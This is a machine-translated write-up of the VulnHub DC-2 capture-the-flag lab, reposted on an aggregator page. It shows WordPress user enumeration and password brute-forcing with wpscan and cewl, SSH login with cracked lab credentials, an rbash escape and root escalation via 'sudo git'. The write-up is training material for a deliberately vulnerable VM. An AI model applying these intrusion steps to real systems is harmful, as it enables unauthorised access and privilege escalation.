当前位置:网站首页>[vulnhub range] - DC2
[vulnhub range] - DC2
2022-04-23 12:38:00 【weixin_ forty-three million four hundred and forty-six thousand】
1、 Environment configuration
kali:88.16.153.14
dc-2:88.16.153.6
To configure hosts file :
linux:vi /etv/hosts
2、 information gathering
2.1 Open ports :80、7744, And 7744 yes ssh service , It's usually 22 port , It's not normal
2.2 Browse the website , hear CMS yes wordpress5.9.3, And there is one flag1, The general meaning of the translation is w No, for my dictionary , Need to use cewl Collect passwords , And flag It may not be in the user directory
2.3 cewl http://dc-2/ -w w.txt, Collect password dictionary
2.4, because cms yes wordpress, But Baidu has its background Directory , The background directory of this website is http://dc-2/wp-login.php
3、 penetration
3.1 kali Tools exist in wpscan, yes wordpress Scan tool , Use this tool to scan user names
wpscan --url dc-2 -e u, Get three user names , Save in user.txt in ,
Use wpscan To crack violently , wpscan --url dc-2 -U user.txt -P w.txt, obtain jerry/adipiscing、tom/parturient
3.2 Log in to this website , Find out flag2, The tip is if I can't take advantage of wordpress Loophole , You can try other entry points
3.3, When collecting ports 7744 The port is on ssh port , Try to use the blasted user name and password ssh Sign in , Use jerry Login time , No authority to report an error , Use tom Successfully logged in
obtain flag3
according to flag3 Content judgment , Need to switch to jerry Under the user , Use su Switch , But no su This command , According to the error report, it should be rbash The escape , I don't really understand , Can own Baidu
BASH_CMDS[a]=/bin/sh ;
a # call /bin/sh command interpreter
/bin/bash # Use bash command interpreter
export PATH=PATH:/bin:/sbin:/usr/bin:/usr/sbin # Set the environment variable
Find the flag4, stay home/jerry Under the table of contents
According to the prompt is to use git Raise the right ,git Yes root jurisdiction
sudo git help config
!/bin/bash
Successfully found the last flag
版权声明
本文为[weixin_ forty-three million four hundred and forty-six thousand]所创,转载请带上原文链接,感谢
https://yzsam.com/2022/04/202204231218506522.html
边栏推荐
- 传统企业如何应对数字化转型?这些书给你答案
- Flash project cross domain interception and DBM database learning [Baotou cultural and creative website development]
- Metalama简介4.使用Fabric操作项目或命名空间
- 一个平面设计师的异想世界|ONES 人物
- Array---
- Everything can be expected in the future | one 2022 campus recruitment officially opened
- How do programmers finalize nucleic acid statistics with 130 lines of code
- Plato farm - a game of farm metauniverse with Plato as the goal
- Pre competition practice of TIANTI competition
- 数组---
猜你喜欢
Qt绘制文字
SSL证书退款说明
Debug Jest test cases in VSCode, debug Jest test cases in VSCode, middle note basedir=$(dirname "$" (echo "$0" sed -e -e, s, \ \, / "-e").
Aviation core technology sharing | overview of safety characteristics of acm32 MCU
远程桌面之终端服务器超出了最大允许连接数解决
Dialogue with Bruce, author of PostgreSQL: "changing careers" is to better move forward
Recommended programming AIDS: picture tool snipaste
The maximum number of remote desktop servers has been exceeded
风尚云网学习-input属性总结
【vulnhub靶场】-dc2
随机推荐
Aviation core technology sharing | overview of safety characteristics of acm32 MCU
Idea setting copyright information
实现一个盒子在父盒子中水平垂直居中的几种“姿势”
Jiachen chapter Genesis "inner universe" joint Edition
On using go language to create websocket service
leetcode:437. 路径总和 III【dfs 选还是不选?】
【csnote】ER图
免费试用一个月的服务器,并附上教程
SQL exercise (I)
box-sizing
Web17 -- use of El and JSTL
航芯技术分享 | ACM32 MCU安全特性概述
[redis series] redis learning 13. Redis often asks simple interview questions
BaseRecyclerViewAdapterHelper 实现下拉刷新和上拉加载
Markdown grammar learning
【unity笔记】L4Unity中的基础光照
AI video cloud vs narrowband HD, who is the darling of the video era
解锁OpenHarmony技术日!年度盛会,即将揭幕!
风尚云网学习-h5的input:type属性的image属性
QT interprocess communication